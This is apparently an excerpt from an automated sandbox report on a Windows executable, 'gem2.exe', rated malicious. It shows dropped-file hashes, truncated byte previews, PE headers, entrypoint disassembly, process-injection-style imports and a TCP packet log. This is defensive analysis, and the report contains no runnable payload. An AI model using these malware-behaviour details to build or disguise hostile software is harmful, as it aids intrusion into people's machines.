                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|../../../....../....u../....../....../....../......./....../../o../\...../\...../Rich../................PE..d......g.........."....*.^.....................@.............................p............`.................................................4....................J...........`..`....J..............................`I..@............p...............................text....].......^.................. ..`.rdata...\...p...^...b..............@..@.data...L<..........................@....pdata...J.......L..................@..@.reloc..`....`.......*..............@..B................................................................................................................................................................................................................................................................................................

                                                              C:\Windows\System32\System-f4855f59e0.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|../../../....../....u../....../....../....../......./....../../o../\...../\...../Rich../................PE..d......g.........."....*.^.....................@.............................p............`.................................................4....................J...........`..`....J..............................`I..@............p...............................text....].......^.................. ..`.rdata...\...p...^...b..............@..@.data...L<..........................@....pdata...J.......L..................@..@.reloc..`....`.......*..............@..B................................................................................................................................................................................................................................................................................................

                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................

                                                              C:\Windows\Temp\__PSScriptPolicyTest_bo4wcxbo.2zy.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Windows\Temp\__PSScriptPolicyTest_h55z2qoh.arq.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Entropy (8bit):6.311350325901448
                                                              TrID:
                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                              • DOS Executable Generic (2002/1) 0.92%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:gem2.exe
                                                              File size:538'624 bytes
                                                              MD5:be89d598cd96443479c02b022ff70532
                                                              SHA1:f0ab69f56ebbbdda791d61fd3d22476d61135871
                                                              SHA256:a4c4487dcacebf5048b2266233f5645cfe421154f26e6685ced36aa0621037f1
                                                              SHA512:36e7cf511786d417f5033b7f743211cef995a6203c4e6db22334f7721355a90ac4e21a118c67e3752b7bdef82fccb74bb978dc30d0e7bfcd69d14855dbe6d3ab
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              TLSH:3DB44B5AA7A843F4E5B7E038C881511AF7B17496132197CF53A14AAB1F23BF19E3E710
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|.../.../.../......./....u../......./......./......./......./......./.../o../\....../\....../Rich.../................PE..d..

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x14003d804
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x140000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x678211C7 [Sat Jan 11 06:37:59 2025 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:2c0880db5251b34da206c7402f553df0

                                                              Entrypoint Preview

                                                              Instruction
                                                              dec eax
                                                              sub esp, 28h
                                                              call 00007FD10884B6E0h
                                                              dec eax
                                                              add esp, 28h
                                                              jmp 00007FD10884ACBFh
                                                              int3
                                                              int3
                                                              dec eax
                                                              mov eax, esp
                                                              dec eax
                                                              mov dword ptr [eax+08h], ebx
                                                              dec eax
                                                              mov dword ptr [eax+10h], ebp
                                                              dec eax
                                                              mov dword ptr [eax+18h], esi
                                                              dec eax
                                                              mov dword ptr [eax+20h], edi
                                                              inc ecx
                                                              push esi
                                                              dec eax
                                                              sub esp, 20h
                                                              dec ecx
                                                              mov ebx, dword ptr [ecx+38h]
                                                              dec eax
                                                              mov esi, edx
                                                              dec ebp
                                                              mov esi, eax
                                                              dec eax
                                                              mov ebp, ecx
                                                              dec ecx
                                                              mov edx, ecx
                                                              dec eax
                                                              mov ecx, esi
                                                              dec ecx
                                                              mov edi, ecx
                                                              dec esp
                                                              lea eax, dword ptr [ebx+04h]
                                                              call 00007FD10884AA7Dh
                                                              mov eax, dword ptr [ebp+04h]
                                                              and al, 66h
                                                              neg al
                                                              mov eax, 00000001h
                                                              inc ebp
                                                              sbb eax, eax
                                                              inc ecx
                                                              neg eax
                                                              inc esp
                                                              add eax, eax
                                                              inc esp
                                                              test dword ptr [ebx+04h], eax
                                                              je 00007FD10884AE53h
                                                              dec esp
                                                              mov ecx, edi
                                                              dec ebp
                                                              mov eax, esi
                                                              dec eax
                                                              mov edx, esi
                                                              dec eax
                                                              mov ecx, ebp
                                                              call 00007FD10884C585h
                                                              dec eax
                                                              mov ebx, dword ptr [esp+30h]
                                                              dec eax
                                                              mov ebp, dword ptr [esp+38h]
                                                              dec eax
                                                              mov esi, dword ptr [esp+40h]
                                                              dec eax
                                                              mov edi, dword ptr [esp+48h]
                                                              dec eax
                                                              add esp, 20h
                                                              inc ecx
                                                              pop esi
                                                              ret
                                                              int3
                                                              dec eax
                                                              mov dword ptr [esp+10h], ebx
                                                              dec eax
                                                              mov dword ptr [esp+18h], esi
                                                              push ebp
                                                              push edi
                                                              inc ecx
                                                              push esi
                                                              dec eax
                                                              mov ebp, esp
                                                              dec eax
                                                              sub esp, 10h
                                                              xor eax, eax
                                                              xor ecx, ecx
                                                              cpuid
                                                              inc esp
                                                              mov eax, ecx
                                                              inc esp
                                                              mov edx, edx
                                                              inc ecx
                                                              xor edx, 49656E69h
                                                              inc ecx
                                                              xor eax, 6C65746Eh
                                                              inc esp
                                                              mov ecx, ebx
                                                              inc esp

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x7bc340xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x810000x4a1c.pdata
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xd60.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x74aa00x1c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x749600x140.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x670000x4b8.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x65d140x65e007f03217ee346ca28a1ec4edee2a16760False0.43878211273006135data6.370663514409348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x670000x15c080x15e0042e8f8aed5b347b2f1d36a093b6b6378False0.39369419642857145data4.885714304384146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x7d0000x3c4c0x1e00dda441d613f0add7fffe1ebe5ef127bcFalse0.15091145833333333data3.6828671253130945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .pdata0x810000x4a1c0x4c00f7fb79d1bfbd6ff81ce784190fddd98bFalse0.4654091282894737data5.619247766039834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x860000xd600xe006a4fe1ef652ccf1d019f1ae70f1687f7False0.45926339285714285data5.393368661048187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.dllGetCurrentProcess, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, ResumeThread, CreateProcessA, GetThreadContext, SetThreadContext, OpenProcess, GetWindowsDirectoryW, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, IsWow64Process, Wow64GetThreadContext, Wow64SetThreadContext, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, Sleep, Process32FirstW, Process32NextW, WriteConsoleW, CreateMutexW, WaitForSingleObject, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, CloseHandle, WriteFile, ReadFile, GetFileSize, CreateFileW, CreateFileA, CreateDirectoryW, SetEnvironmentVariableW, GetEnvironmentVariableW, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, GetTimeZoneInformation, ReadConsoleW, CreateToolhelp32Snapshot, GetStdHandle, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, GetSystemTimeAsFileTime, GetLocaleInfoEx, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, CompareStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, RtlPcToFileHeader, RaiseException, RtlUnwindEx, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapReAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, RtlUnwind
                                                              ADVAPI32.dllRegCreateKeyExA, AllocateAndInitializeSid, CheckTokenMembership, EqualSid, RegGetValueA, RegSetValueExW, RegSetValueExA, RegOpenKeyExW, OpenProcessToken, RegCloseKey, GetTokenInformation, FreeSid
                                                              CRYPT32.dllCryptStringToBinaryA
                                                              WININET.dllInternetOpenA, InternetOpenW, InternetCloseHandle, InternetReadFile, HttpQueryInfoA, InternetCheckConnectionW, InternetOpenUrlA
                                                              WS2_32.dllclosesocket, connect, WSACleanup, getaddrinfo, freeaddrinfo, WSAStartup, socket
                                                              IPHLPAPI.DLLGetAdaptersInfo
                                                              ole32.dllCoInitializeEx, CoGetObject, CoUninitialize

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 12, 2025 09:26:19.272733927 CET4970080192.168.2.7142.250.181.228
                                                              Jan 12, 2025 09:26:19.277592897 CET8049700142.250.181.228192.168.2.7
                                                              Jan 12, 2025 09:26:19.277657032 CET4970080192.168.2.7142.250.181.228
                                                              Jan 12, 2025 09:26:19.277962923 CET4970080192.168.2.7142.250.181.228
                                                              Jan 12, 2025 09:26:19.282777071 CET8049700142.250.181.228192.168.2.7
                                                              Jan 12, 2025 09:26:19.282826900 CET4970080192.168.2.7142.250.181.228
                                                              Jan 12, 2025 09:26:19.314857006 CET49701443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:19.314910889 CET44349701172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:19.315104008 CET49701443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:19.315104008 CET49701443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:19.315359116 CET44349701172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:19.315424919 CET49701443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:19.352032900 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:19.352065086 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:19.352150917 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:19.368756056 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:19.368771076 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:19.850703955 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:19.850821972 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.634747028 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.634769917 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.635792971 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.635871887 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.642147064 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.683326006 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958045006 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958103895 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958117008 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958173037 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958189964 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958229065 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958307028 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958354950 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958393097 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958436012 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958477974 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958523989 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958561897 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958605051 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958638906 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958686113 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958722115 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958769083 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958810091 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958854914 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958892107 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.958940983 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.958980083 CET44349702104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:20.959023952 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.962891102 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:20.962914944 CET49702443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:23.219412088 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:23.219420910 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:23.219595909 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:23.238132000 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:23.238142967 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:23.704773903 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:23.704947948 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.101428986 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.101440907 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.102360964 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.102426052 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.103076935 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.147326946 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415122986 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415230036 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415245056 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415292025 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415298939 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415339947 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415350914 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415401936 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415462017 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415508032 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415554047 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415599108 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415644884 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415688992 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415733099 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415779114 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415817022 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.415865898 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.415987968 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.416039944 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.419635057 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.419701099 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.419719934 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.419812918 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.501960039 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.502021074 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.502059937 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.502109051 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.502149105 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.502201080 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.502219915 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.502260923 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.515558958 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.515618086 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.515667915 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.515717983 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.515758038 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.515809059 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.515839100 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.515950918 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516052008 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516099930 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516156912 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516252995 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516261101 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516304970 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516340971 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516386032 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516729116 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516777992 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516838074 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516884089 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.516922951 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.516968966 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517024994 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.517072916 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517112017 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.517157078 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517193079 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.517237902 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517719984 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.517765999 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517827988 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.517874956 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517911911 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.517962933 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.517997026 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.518044949 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.518079996 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.518122911 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.518160105 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.518203974 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589312077 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589359999 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589426041 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589476109 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589514971 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589559078 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589586973 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589633942 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610522985 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610574007 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610622883 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610671043 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610773087 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610826969 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610889912 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610943079 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610980988 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.611037016 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.611377001 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.611438990 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.611449003 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.611500025 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.612045050 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.612096071 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.612152100 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.612210035 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.612932920 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.612993956 CET49727443192.168.2.7104.21.60.172
